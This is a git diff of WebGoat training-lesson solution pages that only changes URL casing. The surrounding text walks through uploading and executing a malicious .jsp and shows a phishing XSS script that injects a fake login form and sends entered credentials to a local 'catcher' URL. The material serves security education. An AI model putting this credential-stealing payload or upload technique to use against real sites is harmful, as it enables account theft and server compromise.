diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution.html b/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
index 1578e84b2..0a4e0b348 100644
--- a/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
+++ b/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
@@ -36,8 +36,8 @@ Next, we need to figure out where the files are being uploaded so we can execute
Viewing properties of the uploaded image in Firefox.
File path for the uploaded image (and our .jsp) in Firefox.
-The URL should look something like http://localhost/webgoat/uploads/image.jpg.
-The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like http://localhost/webgoat/uploads/yourfile.jsp.
+The URL should look something like http://localhost/WebGoat/uploads/image.jpg.
+The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like http://localhost/WebGoat/uploads/yourfile.jsp.
A blank page will load. You can then return to the lesson and refresh, completing the lesson.
diff --git a/src/main/webapp/lesson_solutions/Phishing.html b/src/main/webapp/lesson_solutions/Phishing.html
index a99b9432e..ac817a401 100644
--- a/src/main/webapp/lesson_solutions/Phishing.html
+++ b/src/main/webapp/lesson_solutions/Phishing.html
@@ -18,7 +18,7 @@ hard for a victim to determinate that the content is malicious.
General Goal(s):
The user should be able to add a form asking for username
and password. On submit the input should be sent to
-http://localhost/webgoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
+http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
Solution:
@@ -38,7 +38,7 @@ name = "pass"><br></form><br><br><HR>
Now you need a script:
-<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+
+<script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
</script>
@@ -53,7 +53,7 @@ calls the script. You can reach this with the onclick="myFunction()" handler:
<input type="submit" name="login" value="login" onclick="hack()">
The final String looks like this:
-</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user="+
+</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
</script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3
diff --git a/src/main/webapp/lesson_solutions/SoapRequest.html b/src/main/webapp/lesson_solutions/SoapRequest.html
index 58a40a193..72b3257e3 100644
--- a/src/main/webapp/lesson_solutions/SoapRequest.html
+++ b/src/main/webapp/lesson_solutions/SoapRequest.html
@@ -777,7 +777,7 @@ HTTP Request with WebScarab and click on the
Change the POST header to open
the SoapRequest:
- POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 (This will vary based on which ports you are using)
+ POST http://localhost/WebGoat/services/SoapRequest HTTP/1.1 (This will vary based on which ports you are using)
Change the Content-Type to
text/xml: